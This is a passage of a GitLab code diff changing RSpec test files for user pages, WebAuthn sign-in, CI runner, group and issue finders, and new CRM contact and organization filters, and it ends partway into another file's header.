subject - expect(page).to have_css(".cover-title", text: 'Blocked user') end it 'shows no additional fields' do - subject - expect(page).not_to have_css(".profile-user-bio") expect(page).not_to have_content('GitLab - work info test') expect(page).not_to have_content('Frontend Engineer') @@ -243,10 +240,10 @@ RSpec.describe 'User page' do end it 'shows username' do - subject - expect(page).to have_content("@#{user.username}") end + + it_behaves_like 'default brand title page meta description' end context 'with unconfirmed user' do @@ -256,7 +253,8 @@ RSpec.describe 'User page' do :unconfirmed, organization: 'GitLab - work info test', job_title: 'Frontend Engineer', - pronunciation: 'pruh-nuhn-see-ay-shn' + pronunciation: 'pruh-nuhn-see-ay-shn', + bio: 'My personal bio' ) end @@ -287,6 +285,8 @@ RSpec.describe 'User page' do it 'shows private profile message' do expect(page).to have_content("This user has a private profile") end + + it_behaves_like 'default brand title page meta description' end context 'when visited by an authenticated user' do diff --git a/spec/features/webauthn_spec.rb b/spec/features/webauthn_spec.rb index 4eebc9d2c1e..215d1ff1cb6 100644 --- a/spec/features/webauthn_spec.rb +++ b/spec/features/webauthn_spec.rb @@ -113,124 +113,94 @@ RSpec.describe 'Using WebAuthn Devices for Authentication', :js do describe 'authentication' do let(:otp_required_for_login) { true } let(:user) { create(:user, webauthn_xid: WebAuthn.generate_user_id, otp_required_for_login: otp_required_for_login) } + let!(:webauthn_device) do + add_webauthn_device(app_id, user) + end - describe 'when there is only an U2F device' do - let!(:u2f_device) do - fake_device = U2F::FakeU2F.new(app_id) # "Client" - u2f = U2F::U2F.new(app_id) # "Server" + describe 'when 2FA via OTP is disabled' do + let(:otp_required_for_login) { false } - challenges = u2f.registration_requests.map(&:challenge) - device_response = fake_device.register_response(challenges[0]) - device_registration_params = { 
device_response: device_response, - name: 'My device' } + it 'allows logging in with the WebAuthn device' do + gitlab_sign_in(user) - U2fRegistration.register(user, app_id, device_registration_params, challenges) - FakeU2fDevice.new(page, 'My device', fake_device) - end + webauthn_device.respond_to_webauthn_authentication - it 'falls back to U2F' do - # WebAuthn registration is automatically created with the U2fRegistration because of the after_create callback - # so we need to delete it - WebauthnRegistration.delete_all + expect(page).to have_css('.sign-out-link', visible: false) + end + end + describe 'when 2FA via OTP is enabled' do + it 'allows logging in with the WebAuthn device' do gitlab_sign_in(user) - u2f_device.respond_to_u2f_authentication + webauthn_device.respond_to_webauthn_authentication expect(page).to have_css('.sign-out-link', visible: false) end end - describe 'when there is a WebAuthn device' do - let!(:webauthn_device) do - add_webauthn_device(app_id, user) - end + describe 'when a given WebAuthn device has already been registered by another user' do + describe 'but not the current user' do + let(:other_user) { create(:user, webauthn_xid: WebAuthn.generate_user_id, otp_required_for_login: otp_required_for_login) } - describe 'when 2FA via OTP is disabled' do - let(:otp_required_for_login) { false } + it 'does not allow logging in with that particular device' do + # Register other user with a different WebAuthn device + other_device = add_webauthn_device(app_id, other_user) - it 'allows logging in with the WebAuthn device' do + # Try authenticating user with the old WebAuthn device gitlab_sign_in(user) - - webauthn_device.respond_to_webauthn_authentication - - expect(page).to have_css('.sign-out-link', visible: false) + other_device.respond_to_webauthn_authentication + expect(page).to have_content('Authentication via WebAuthn device failed') end end - describe 'when 2FA via OTP is enabled' do - it 'allows logging in with the WebAuthn device' do 
- gitlab_sign_in(user) - + describe "and also the current user" do + # TODO Uncomment once WebAuthn::FakeClient supports passing credential options + # (especially allow_credentials, as this is needed to specify which credential the + # fake client should use. Currently, the first credential is always used). + # There is an issue open for this: https://github.com/cedarcode/webauthn-ruby/issues/259 + it "allows logging in with that particular device" do + pending("support for passing credential options in FakeClient") + # Register current user with the same WebAuthn device + current_user = gitlab_sign_in(:user) + visit profile_account_path + manage_two_factor_authentication + register_webauthn_device(webauthn_device) + gitlab_sign_out + + # Try authenticating user with the same WebAuthn device + gitlab_sign_in(current_user) webauthn_device.respond_to_webauthn_authentication expect(page).to have_css('.sign-out-link', visible: false) end end + end - describe 'when a given WebAuthn device has already been registered by another user' do - describe 'but not the current user' do - let(:other_user) { create(:user, webauthn_xid: WebAuthn.generate_user_id, otp_required_for_login: otp_required_for_login) } - - it 'does not allow logging in with that particular device' do - # Register other user with a different WebAuthn device - other_device = add_webauthn_device(app_id, other_user) - - # Try authenticating user with the old WebAuthn device - gitlab_sign_in(user) - other_device.respond_to_webauthn_authentication - expect(page).to have_content('Authentication via WebAuthn device failed') - end - end - - describe "and also the current user" do - # TODO Uncomment once WebAuthn::FakeClient supports passing credential options - # (especially allow_credentials, as this is needed to specify which credential the - # fake client should use. Currently, the first credential is always used). 
- # There is an issue open for this: https://github.com/cedarcode/webauthn-ruby/issues/259 - it "allows logging in with that particular device" do - pending("support for passing credential options in FakeClient") - # Register current user with the same WebAuthn device - current_user = gitlab_sign_in(:user) - visit profile_account_path - manage_two_factor_authentication - register_webauthn_device(webauthn_device) - gitlab_sign_out - - # Try authenticating user with the same WebAuthn device - gitlab_sign_in(current_user) - webauthn_device.respond_to_webauthn_authentication - - expect(page).to have_css('.sign-out-link', visible: false) - end - end - end - - describe 'when a given WebAuthn device has not been registered' do - it 'does not allow logging in with that particular device' do - unregistered_device = FakeWebauthnDevice.new(page, 'My device') - gitlab_sign_in(user) - unregistered_device.respond_to_webauthn_authentication + describe 'when a given WebAuthn device has not been registered' do + it 'does not allow logging in with that particular device' do + unregistered_device = FakeWebauthnDevice.new(page, 'My device') + gitlab_sign_in(user) + unregistered_device.respond_to_webauthn_authentication - expect(page).to have_content('Authentication via WebAuthn device failed') - end + expect(page).to have_content('Authentication via WebAuthn device failed') end + end - describe 'when more than one device has been registered by the same user' do - it 'allows logging in with either device' do - first_device = add_webauthn_device(app_id, user) - second_device = add_webauthn_device(app_id, user) + describe 'when more than one device has been registered by the same user' do + it 'allows logging in with either device' do + first_device = add_webauthn_device(app_id, user) + second_device = add_webauthn_device(app_id, user) - # Authenticate as both devices - [first_device, second_device].each do |device| - gitlab_sign_in(user) - # register_webauthn_device(device) - 
device.respond_to_webauthn_authentication + # Authenticate as both devices + [first_device, second_device].each do |device| + gitlab_sign_in(user) + # register_webauthn_device(device) + device.respond_to_webauthn_authentication - expect(page).to have_css('.sign-out-link', visible: false) + expect(page).to have_css('.sign-out-link', visible: false) - gitlab_sign_out - end + gitlab_sign_out end end end diff --git a/spec/finders/ci/auth_job_finder_spec.rb b/spec/finders/ci/auth_job_finder_spec.rb index 78827c9ddee..0a326699875 100644 --- a/spec/finders/ci/auth_job_finder_spec.rb +++ b/spec/finders/ci/auth_job_finder_spec.rb @@ -70,17 +70,6 @@ RSpec.describe Ci::AuthJobFinder do expect(subject.user).to be_from_ci_job_token expect(subject.user.ci_job_token_scope.source_project).to eq(job.project) end - - context 'when feature flag ci_scoped_job_token is disabled' do - before do - stub_feature_flags(ci_scoped_job_token: false) - end - - it 'does not set ci_job_token_scope on the job user' do - expect(subject).to eq(job) - expect(subject.user).not_to be_from_ci_job_token - end - end end end end diff --git a/spec/finders/ci/runners_finder_spec.rb b/spec/finders/ci/runners_finder_spec.rb index 10d3f641e02..7e3c1abd6d1 100644 --- a/spec/finders/ci/runners_finder_spec.rb +++ b/spec/finders/ci/runners_finder_spec.rb @@ -59,6 +59,20 @@ RSpec.describe Ci::RunnersFinder do end end + context 'by active status' do + it 'with active set as false calls the corresponding scope on Ci::Runner with false' do + expect(Ci::Runner).to receive(:active).with(false).and_call_original + + described_class.new(current_user: admin, params: { active: false }).execute + end + + it 'with active set as true calls the corresponding scope on Ci::Runner with true' do + expect(Ci::Runner).to receive(:active).with(true).and_call_original + + described_class.new(current_user: admin, params: { active: true }).execute + end + end + context 'by runner type' do it 'calls the corresponding scope on Ci::Runner' 
do expect(Ci::Runner).to receive(:project_type).and_call_original @@ -263,7 +277,15 @@ RSpec.describe Ci::RunnersFinder do let(:extra_params) { { search: 'runner_project_search' } } it 'returns correct runner' do - expect(subject).to eq([runner_project_3]) + expect(subject).to match_array([runner_project_3]) + end + end + + context 'by active status' do + let(:extra_params) { { active: false } } + + it 'returns correct runner' do + expect(subject).to match_array([runner_sub_group_1]) end end @@ -271,7 +293,7 @@ RSpec.describe Ci::RunnersFinder do let(:extra_params) { { status_status: 'paused' } } it 'returns correct runner' do - expect(subject).to eq([runner_sub_group_1]) + expect(subject).to match_array([runner_sub_group_1]) end end @@ -279,7 +301,7 @@ RSpec.describe Ci::RunnersFinder do let(:extra_params) { { tag_name: %w[runner_tag] } } it 'returns correct runner' do - expect(subject).to eq([runner_project_5]) + expect(subject).to match_array([runner_project_5]) end end diff --git a/spec/finders/environments/environments_by_deployments_finder_spec.rb b/spec/finders/environments/environments_by_deployments_finder_spec.rb index 7804ffa4ef1..1b86aced67d 100644 --- a/spec/finders/environments/environments_by_deployments_finder_spec.rb +++ b/spec/finders/environments/environments_by_deployments_finder_spec.rb @@ -11,7 +11,7 @@ RSpec.describe Environments::EnvironmentsByDeploymentsFinder do project.add_maintainer(user) end - shared_examples 'execute' do + describe '#execute' do context 'tagged deployment' do let(:environment_two) { create(:environment, project: project) } # Environments need to include commits, so rewind two commits to fit @@ -124,16 +124,4 @@ RSpec.describe Environments::EnvironmentsByDeploymentsFinder do end end end - - describe "#execute" do - include_examples 'execute' - - context 'when environments_by_deployments_finder_exists_optimization is disabled' do - before do - stub_feature_flags(environments_by_deployments_finder_exists_optimization: 
false) - end - - include_examples 'execute' - end - end end diff --git a/spec/finders/group_descendants_finder_spec.rb b/spec/finders/group_descendants_finder_spec.rb index 01c6eb05907..f6b87f7eeab 100644 --- a/spec/finders/group_descendants_finder_spec.rb +++ b/spec/finders/group_descendants_finder_spec.rb @@ -4,7 +4,12 @@ require 'spec_helper' RSpec.describe GroupDescendantsFinder do let_it_be(:user) { create(:user) } - let_it_be(:group) { create(:group) } + + let_it_be_with_reload(:group) do + create(:group).tap do |g| + g.add_owner(user) + end + end let(:params) { {} } @@ -12,254 +17,262 @@ RSpec.describe GroupDescendantsFinder do described_class.new(current_user: user, parent_group: group, params: params) end - before do - group.add_owner(user) - end - - describe '#has_children?' do - it 'is true when there are projects' do - create(:project, namespace: group) - - expect(finder.has_children?).to be_truthy - end - - context 'when there are subgroups' do + shared_examples 'group descentants finder examples' do + describe '#has_children?' 
do it 'is true when there are projects' do - create(:group, parent: group) + create(:project, namespace: group) expect(finder.has_children?).to be_truthy end - end - end - describe '#execute' do - it 'includes projects' do - project = create(:project, namespace: group) + context 'when there are subgroups' do + it 'is true when there are projects' do + create(:group, parent: group) - expect(finder.execute).to contain_exactly(project) + expect(finder.has_children?).to be_truthy + end + end end - context 'when archived is `true`' do - let(:params) { { archived: 'true' } } - - it 'includes archived projects' do - archived_project = create(:project, namespace: group, archived: true) + describe '#execute' do + it 'includes projects' do project = create(:project, namespace: group) - expect(finder.execute).to contain_exactly(archived_project, project) + expect(finder.execute).to contain_exactly(project) end - end - context 'when archived is `only`' do - let(:params) { { archived: 'only' } } + context 'when archived is `true`' do + let(:params) { { archived: 'true' } } - it 'includes only archived projects' do - archived_project = create(:project, namespace: group, archived: true) - _project = create(:project, namespace: group) + it 'includes archived projects' do + archived_project = create(:project, namespace: group, archived: true) + project = create(:project, namespace: group) - expect(finder.execute).to contain_exactly(archived_project) + expect(finder.execute).to contain_exactly(archived_project, project) + end end - end - it 'does not include archived projects' do - _archived_project = create(:project, :archived, namespace: group) + context 'when archived is `only`' do + let(:params) { { archived: 'only' } } - expect(finder.execute).to be_empty - end + it 'includes only archived projects' do + archived_project = create(:project, namespace: group, archived: true) + _project = create(:project, namespace: group) - context 'with a filter' do - let(:params) { { filter: 
'test' } } + expect(finder.execute).to contain_exactly(archived_project) + end + end - it 'includes only projects matching the filter' do - _other_project = create(:project, namespace: group) - matching_project = create(:project, namespace: group, name: 'testproject') + it 'does not include archived projects' do + _archived_project = create(:project, :archived, namespace: group) - expect(finder.execute).to contain_exactly(matching_project) + expect(finder.execute).to be_empty end - end - it 'sorts elements by name as default' do - project1 = create(:project, namespace: group, name: 'z') - project2 = create(:project, namespace: group, name: 'a') + context 'with a filter' do + let(:params) { { filter: 'test' } } - expect(subject.execute).to eq([project2, project1]) - end + it 'includes only projects matching the filter' do + _other_project = create(:project, namespace: group) + matching_project = create(:project, namespace: group, name: 'testproject') - context 'sorting by name' do - let!(:project1) { create(:project, namespace: group, name: 'a', path: 'project-a') } - let!(:project2) { create(:project, namespace: group, name: 'z', path: 'project-z') } - let(:params) do - { - sort: 'name_asc' - } + expect(finder.execute).to contain_exactly(matching_project) + end end - it 'sorts elements by name' do - expect(subject.execute).to eq( - [ - project1, - project2 - ] - ) + it 'sorts elements by name as default' do + project1 = create(:project, namespace: group, name: 'z') + project2 = create(:project, namespace: group, name: 'a') + + expect(subject.execute).to match_array([project2, project1]) end - context 'with nested groups' do - let!(:subgroup1) { create(:group, parent: group, name: 'a', path: 'sub-a') } - let!(:subgroup2) { create(:group, parent: group, name: 'z', path: 'sub-z') } + context 'sorting by name' do + let!(:project1) { create(:project, namespace: group, name: 'a', path: 'project-a') } + let!(:project2) { create(:project, namespace: group, name: 'z', path: 
'project-z') } + let(:params) do + { + sort: 'name_asc' + } + end it 'sorts elements by name' do expect(subject.execute).to eq( [ - subgroup1, - subgroup2, project1, project2 ] ) end - end - end - - it 'does not include projects shared with the group' do - project = create(:project, namespace: group) - other_project = create(:project) - other_project.project_group_links.create!(group: group, - group_access: Gitlab::Access::MAINTAINER) - expect(finder.execute).to contain_exactly(project) - end - end + context 'with nested groups' do + let!(:subgroup1) { create(:group, parent: group, name: 'a', path: 'sub-a') } + let!(:subgroup2) { create(:group, parent: group, name: 'z', path: 'sub-z') } + + it 'sorts elements by name' do + expect(subject.execute).to eq( + [ + subgroup1, + subgroup2, + project1, + project2 + ] + ) + end + end + end - context 'with shared groups' do - let_it_be(:other_group) { create(:group) } - let_it_be(:shared_group_link) do - create(:group_group_link, - shared_group: group, - shared_with_group: other_group) - end + it 'does not include projects shared with the group' do + project = create(:project, namespace: group) + other_project = create(:project) + other_project.project_group_links.create!(group: group, + group_access: Gitlab::Access::MAINTAINER) - context 'without common ancestor' do - it { expect(finder.execute).to be_empty } + expect(finder.execute).to contain_exactly(project) + end end - context 'with common ancestor' do - let_it_be(:common_ancestor) { create(:group) } - let_it_be(:other_group) { create(:group, parent: common_ancestor) } - let_it_be(:group) { create(:group, parent: common_ancestor) } + context 'with shared groups' do + let_it_be(:other_group) { create(:group) } + let_it_be(:shared_group_link) do + create(:group_group_link, + shared_group: group, + shared_with_group: other_group) + end - context 'querying under the common ancestor' do + context 'without common ancestor' do it { expect(finder.execute).to be_empty } end - 
context 'querying the common ancestor' do - subject(:finder) do - described_class.new(current_user: user, parent_group: common_ancestor, params: params) + context 'with common ancestor' do + let_it_be(:common_ancestor) { create(:group) } + let_it_be(:other_group) { create(:group, parent: common_ancestor) } + let_it_be(:group) { create(:group, parent: common_ancestor) } + + context 'querying under the common ancestor' do + it { expect(finder.execute).to be_empty } end - it 'contains shared subgroups' do - expect(finder.execute).to contain_exactly(group, other_group) + context 'querying the common ancestor' do + subject(:finder) do + described_class.new(current_user: user, parent_group: common_ancestor, params: params) + end + + it 'contains shared subgroups' do + expect(finder.execute).to contain_exactly(group, other_group) + end end end end - end - context 'with nested groups' do - let!(:project) { create(:project, namespace: group) } - let!(:subgroup) { create(:group, :private, parent: group) } + context 'with nested groups' do + let!(:project) { create(:project, namespace: group) } + let!(:subgroup) { create(:group, :private, parent: group) } - describe '#execute' do - it 'contains projects and subgroups' do - expect(finder.execute).to contain_exactly(subgroup, project) - end + describe '#execute' do + it 'contains projects and subgroups' do + expect(finder.execute).to contain_exactly(subgroup, project) + end - it 'does not include subgroups the user does not have access to' do - subgroup.update!(visibility_level: Gitlab::VisibilityLevel::PRIVATE) + it 'does not include subgroups the user does not have access to' do + subgroup.update!(visibility_level: Gitlab::VisibilityLevel::PRIVATE) - public_subgroup = create(:group, :public, parent: group, path: 'public-group') - other_subgroup = create(:group, :private, parent: group, path: 'visible-private-group') - other_user = create(:user) - other_subgroup.add_developer(other_user) + public_subgroup = create(:group, 
:public, parent: group, path: 'public-group') + other_subgroup = create(:group, :private, parent: group, path: 'visible-private-group') + other_user = create(:user) + other_subgroup.add_developer(other_user) - finder = described_class.new(current_user: other_user, parent_group: group) + finder = described_class.new(current_user: other_user, parent_group: group) - expect(finder.execute).to contain_exactly(public_subgroup, other_subgroup) - end + expect(finder.execute).to contain_exactly(public_subgroup, other_subgroup) + end - it 'only includes public groups when no user is given' do - public_subgroup = create(:group, :public, parent: group) - _private_subgroup = create(:group, :private, parent: group) + it 'only includes public groups when no user is given' do + public_subgroup = create(:group, :public, parent: group) + _private_subgroup = create(:group, :private, parent: group) - finder = described_class.new(current_user: nil, parent_group: group) + finder = described_class.new(current_user: nil, parent_group: group) - expect(finder.execute).to contain_exactly(public_subgroup) - end + expect(finder.execute).to contain_exactly(public_subgroup) + end - context 'when archived is `true`' do - let(:params) { { archived: 'true' } } + context 'when archived is `true`' do + let(:params) { { archived: 'true' } } - it 'includes archived projects in the count of subgroups' do - create(:project, namespace: subgroup, archived: true) + it 'includes archived projects in the count of subgroups' do + create(:project, namespace: subgroup, archived: true) - expect(finder.execute.first.preloaded_project_count).to eq(1) + expect(finder.execute.first.preloaded_project_count).to eq(1) + end end - end - context 'with a filter' do - let(:params) { { filter: 'test' } } + context 'with a filter' do + let(:params) { { filter: 'test' } } - it 'contains only matching projects and subgroups' do - matching_project = create(:project, namespace: group, name: 'Testproject') - matching_subgroup = 
create(:group, name: 'testgroup', parent: group) + it 'contains only matching projects and subgroups' do + matching_project = create(:project, namespace: group, name: 'Testproject') + matching_subgroup = create(:group, name: 'testgroup', parent: group) - expect(finder.execute).to contain_exactly(matching_subgroup, matching_project) - end + expect(finder.execute).to contain_exactly(matching_subgroup, matching_project) + end - it 'does not include subgroups the user does not have access to' do - _invisible_subgroup = create(:group, :private, parent: group, name: 'test1') - other_subgroup = create(:group, :private, parent: group, name: 'test2') - public_subgroup = create(:group, :public, parent: group, name: 'test3') - other_subsubgroup = create(:group, :private, parent: other_subgroup, name: 'test4') - other_user = create(:user) - other_subgroup.add_developer(other_user) + it 'does not include subgroups the user does not have access to' do + _invisible_subgroup = create(:group, :private, parent: group, name: 'test1') + other_subgroup = create(:group, :private, parent: group, name: 'test2') + public_subgroup = create(:group, :public, parent: group, name: 'test3') + other_subsubgroup = create(:group, :private, parent: other_subgroup, name: 'test4') + other_user = create(:user) + other_subgroup.add_developer(other_user) - finder = described_class.new(current_user: other_user, - parent_group: group, - params: params) + finder = described_class.new(current_user: other_user, + parent_group: group, + params: params) - expect(finder.execute).to contain_exactly(other_subgroup, public_subgroup, other_subsubgroup) - end + expect(finder.execute).to contain_exactly(other_subgroup, public_subgroup, other_subsubgroup) + end - context 'with matching children' do - it 'includes a group that has a subgroup matching the query and its parent' do - matching_subgroup = create(:group, :private, name: 'testgroup', parent: subgroup) + context 'with matching children' do + it 'includes a 
group that has a subgroup matching the query and its parent' do + matching_subgroup = create(:group, :private, name: 'testgroup', parent: subgroup) - expect(finder.execute).to contain_exactly(subgroup, matching_subgroup) - end + expect(finder.execute).to contain_exactly(subgroup, matching_subgroup) + end - it 'includes the parent of a matching project' do - matching_project = create(:project, namespace: subgroup, name: 'Testproject') + it 'includes the parent of a matching project' do + matching_project = create(:project, namespace: subgroup, name: 'Testproject') - expect(finder.execute).to contain_exactly(subgroup, matching_project) - end + expect(finder.execute).to contain_exactly(subgroup, matching_project) + end - context 'with a small page size' do - let(:params) { { filter: 'test', per_page: 1 } } + context 'with a small page size' do + let(:params) { { filter: 'test', per_page: 1 } } - it 'contains all the ancestors of a matching subgroup regardless the page size' do - subgroup = create(:group, :private, parent: group) - matching = create(:group, :private, name: 'testgroup', parent: subgroup) + it 'contains all the ancestors of a matching subgroup regardless the page size' do + subgroup = create(:group, :private, parent: group) + matching = create(:group, :private, name: 'testgroup', parent: subgroup) - expect(finder.execute).to contain_exactly(subgroup, matching) + expect(finder.execute).to contain_exactly(subgroup, matching) + end end - end - it 'does not include the parent itself' do - group.update!(name: 'test') + it 'does not include the parent itself' do + group.update!(name: 'test') - expect(finder.execute).not_to include(group) + expect(finder.execute).not_to include(group) + end end end end end end + + it_behaves_like 'group descentants finder examples' + + context 'when feature flag :linear_group_descendants_finder is disabled' do + before do + stub_feature_flags(linear_group_descendants_finder: false) + end + + it_behaves_like 'group descentants 
finder examples' + end end diff --git a/spec/finders/groups_finder_spec.rb b/spec/finders/groups_finder_spec.rb index 10a08d7326e..a4cbee6a124 100644 --- a/spec/finders/groups_finder_spec.rb +++ b/spec/finders/groups_finder_spec.rb @@ -5,7 +5,7 @@ require 'spec_helper' RSpec.describe GroupsFinder do include AdminModeHelper - describe '#execute' do + shared_examples '#execute' do let(:user) { create(:user) } describe 'root level groups' do @@ -20,6 +20,7 @@ RSpec.describe GroupsFinder do user_private_group) :regular | { all_available: false } | %i(user_public_group user_internal_group user_private_group) :regular | {} | %i(public_group internal_group user_public_group user_internal_group user_private_group) + :regular | { min_access_level: Gitlab::Access::DEVELOPER } | %i(user_public_group user_internal_group user_private_group) :external | { all_available: true } | %i(public_group user_public_group user_internal_group user_private_group) :external | { all_available: false } | %i(user_public_group user_internal_group user_private_group) @@ -261,4 +262,16 @@ RSpec.describe GroupsFinder do end end end + + describe '#execute' do + include_examples '#execute' + + context 'when use_traversal_ids_groups_finder feature flags is disabled' do + before do + stub_feature_flags(use_traversal_ids_groups_finder: false) + end + + include_examples '#execute' + end + end end diff --git a/spec/finders/issuables/crm_contact_filter_spec.rb b/spec/finders/issuables/crm_contact_filter_spec.rb new file mode 100644 index 00000000000..d6eccab39ad --- /dev/null +++ b/spec/finders/issuables/crm_contact_filter_spec.rb @@ -0,0 +1,45 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Issuables::CrmContactFilter do + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } + + let_it_be(:contact1) { create(:contact, group: group) } + let_it_be(:contact2) { create(:contact, group: group) } + + let_it_be(:contact1_issue1) { 
create(:issue, project: project) } + let_it_be(:contact1_issue2) { create(:issue, project: project) } + let_it_be(:contact2_issue1) { create(:issue, project: project) } + let_it_be(:issues) { Issue.where(id: [contact1_issue1.id, contact1_issue2.id, contact2_issue1.id]) } + + before_all do + create(:issue_customer_relations_contact, issue: contact1_issue1, contact: contact1) + create(:issue_customer_relations_contact, issue: contact1_issue2, contact: contact1) + create(:issue_customer_relations_contact, issue: contact2_issue1, contact: contact2) + end + + describe 'when a contact has issues' do + it 'returns all contact1 issues' do + params = { crm_contact_id: contact1.id } + + expect(described_class.new(params: params).filter(issues)).to contain_exactly(contact1_issue1, contact1_issue2) + end + + it 'returns all contact2 issues' do + params = { crm_contact_id: contact2.id } + + expect(described_class.new(params: params).filter(issues)).to contain_exactly(contact2_issue1) + end + end + + describe 'when a contact has no issues' do + it 'returns no issues' do + contact3 = create(:contact, group: group) + params = { crm_contact_id: contact3.id } + + expect(described_class.new(params: params).filter(issues)).to be_empty + end + end +end diff --git a/spec/finders/issuables/crm_organization_filter_spec.rb b/spec/finders/issuables/crm_organization_filter_spec.rb new file mode 100644 index 00000000000..2a521dcf721 --- /dev/null +++ b/spec/finders/issuables/crm_organization_filter_spec.rb @@ -0,0 +1,48 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Issuables::CrmOrganizationFilter do + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } + + let_it_be(:organization1) { create(:organization, group: group) } + let_it_be(:organization2) { create(:organization, group: group) } + let_it_be(:contact1) { create(:contact, group: group, organization: organization1) } + let_it_be(:contact2) { create(:contact, 
group: group, organization: organization1) } + let_it_be(:contact3) { create(:contact, group: group, organization: organization2) } + + let_it_be(:contact1_issue) { create(:issue, project: project) } + let_it_be(:contact2_issue) { create(:issue, project: project) } + let_it_be(:contact3_issue) { create(:issue, project: project) } + let_it_be(:issues) { Issue.where(id: [contact1_issue.id, contact2_issue.id, contact3_issue.id]) } + + before_all do + create(:issue_customer_relations_contact, issue: contact1_issue, contact: contact1) + create(:issue_customer_relations_contact, issue: contact2_issue, contact: contact2) + create(:issue_customer_relations_contact, issue: contact3_issue, contact: contact3) + end + + describe 'when an organization has issues' do + it 'returns all organization1 issues' do + params = { crm_organization_id: organization1.id } + + expect(described_class.new(params: params).filter(issues)).to contain_exactly(contact1_issue, contact2_issue) + end + + it 'returns all organization2 issues' do + params = { crm_organization_id: organization2.id } + + expect(described_class.new(params: params).filter(issues)).to contain_exactly(contact3_issue) + end + end + + describe 'when an organization has no issues' do + it 'returns no issues' do + organization3 = create(:organization, group: group) + params = { crm_organization_id: organization3.id } + + expect(described_class.new(params: params).filter(issues)).to be_empty + end + end +end diff --git a/spec/finders/issues_finder_spec.rb b/spec/finders/issues_finder_spec.rb index 9f12308013e..31563a6326d 100644 --- a/spec/finders/issues_finder_spec.rb +++ b/spec/finders/issues_finder_spec.rb @@ -910,6 +910,45 @@ RSpec.describe IssuesFinder do end end + context 'filtering by crm contact' do + let_it_be(:contact1) { create(:contact, group: group) } + let_it_be(:contact2) { create(:contact, group: group) } + + let_it_be(:contact1_issue1) { create(:issue, project: project1) } + let_it_be(:contact1_issue2) { 
create(:issue, project: project1) } + let_it_be(:contact2_issue1) { create(:issue, project: project1) } + + let(:params) { { crm_contact_id: contact1.id } } + + it 'returns for that contact' do + create(:issue_customer_relations_contact, issue: contact1_issue1, contact: contact1) + create(:issue_customer_relations_contact, issue: contact1_issue2, contact: contact1) + create(:issue_customer_relations_contact, issue: contact2_issue1, contact: contact2) + + expect(issues).to contain_exactly(contact1_issue1, contact1_issue2) + end + end + + context 'filtering by crm organization' do + let_it_be(:organization) { create(:organization, group: group) } + let_it_be(:contact1) { create(:contact, group: group, organization: organization) } + let_it_be(:contact2) { create(:contact, group: group, organization: organization) } + + let_it_be(:contact1_issue1) { create(:issue, project: project1) } + let_it_be(:contact1_issue2) { create(:issue, project: project1) } + let_it_be(:contact2_issue1) { create(:issue, project: project1) } + + let(:params) { { crm_organization_id: organization.id } } + + it 'returns for that contact' do + create(:issue_customer_relations_contact, issue: contact1_issue1, contact: contact1) + create(:issue_customer_relations_contact, issue: contact1_issue2, contact: contact1) + create(:issue_customer_relations_contact, issue: contact2_issue1, contact: contact2) + + expect(issues).to contain_exactly(contact1_issue1, contact1_issue2, contact2_issue1) + end + end + context 'when the user is unauthorized' do let(:search_user) { nil } diff --git a/spec/finders/merge_requests_finder_spec.rb b/spec/finders/merge_requests_finder_spec.rb index 42197a6b103..03639bc0b98 100644 --- a/spec/finders/merge_requests_finder_spec.rb +++ b/spec/finders/merge_requests_finder_spec.rb @@ -681,6 +681,18 @@ RSpec.describe MergeRequestsFinder do expect(mrs).to eq([mr1]) end + it 'filters merge requests ignoring empty deployed_before' do + mrs = described_class.new(user, 
deployed_before: '').execute + + expect(mrs.size).to eq(7) + end + + it 'filters merge requests ignoring invalid deployed_before' do + mrs = described_class.new(user, deployed_before: '2021-99-99').execute + + expect(mrs.size).to eq(7) + end + it 'filters merge requests deployed after a given date' do mrs = described_class .new(user, deployed_after: '2020-10-01 12:00') @@ -688,6 +700,18 @@ RSpec.describe MergeRequestsFinder do expect(mrs).to eq([mr2]) end + + it 'filters merge requests ignoring empty deployed_after' do + mrs = described_class.new(user, deployed_after: '').execute + + expect(mrs.size).to eq(7) + end + + it 'filters merge requests ignoring invalid deployed_after' do + mrs = described_class.new(user, deployed_after: '2021-99-99').execute + + expect(mrs.size).to eq(7) + end end it 'does not raise any exception with complex filters' do diff --git a/spec/finders/packages/build_infos_finder_spec.rb b/spec/finders/packages/build_infos_finder_spec.rb new file mode 100644 index 00000000000..23425de4316 --- /dev/null +++ b/spec/finders/packages/build_infos_finder_spec.rb @@ -0,0 +1,64 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe ::Packages::BuildInfosFinder do + using RSpec::Parameterized::TableSyntax + + let_it_be(:package) { create(:package) } + let_it_be(:build_infos) { create_list(:package_build_info, 5, :with_pipeline, package: package) } + let_it_be(:build_info_with_empty_pipeline) { create(:package_build_info, package: package) } + + let(:finder) { described_class.new(package, params) } + let(:params) do + { + first: first, + last: last, + after: after, + before: before, + max_page_size: max_page_size, + support_next_page: support_next_page + } + end + + describe '#execute' do + subject { finder.execute } + + where(:first, :last, :after_index, :before_index, :max_page_size, :support_next_page, :expected_build_infos_indexes) do + # F L AI BI MPS SNP + nil | nil | nil | nil | nil | false | [4, 3, 2, 1, 0] + nil | nil | nil 
| nil | 10 | false | [4, 3, 2, 1, 0] + nil | nil | nil | nil | 2 | false | [4, 3] + 2 | nil | nil | nil | nil | false | [4, 3] + 2 | nil | nil | nil | nil | true | [4, 3, 2] + 2 | nil | 3 | nil | nil | false | [2, 1] + 2 | nil | 3 | nil | nil | true | [2, 1, 0] + 3 | nil | 4 | nil | 2 | false | [3, 2] + 3 | nil | 4 | nil | 2 | true | [3, 2, 1] + nil | 2 | nil | nil | nil | false | [0, 1] + nil | 2 | nil | nil | nil | true | [0, 1, 2] + nil | 2 | nil | 1 | nil | false | [2, 3] + nil | 2 | nil | 1 | nil | true | [2, 3, 4] + nil | 3 | nil | 0 | 2 | false | [1, 2] + nil | 3 | nil | 0 | 2 | true | [1, 2, 3] + end + + with_them do + let(:expected_build_infos) do + expected_build_infos_indexes.map do |idx| + build_infos[idx] + end + end + + let(:after) do + build_infos[after_index].pipeline_id if after_index + end + + let(:before) do + build_infos[before_index].pipeline_id if before_index + end + + it { is_expected.to eq(expected_build_infos) } + end + end +end diff --git a/spec/finders/packages/group_packages_finder_spec.rb b/spec/finders/packages/group_packages_finder_spec.rb index 3254c436674..c2dbfb59eb2 100644 --- a/spec/finders/packages/group_packages_finder_spec.rb +++ 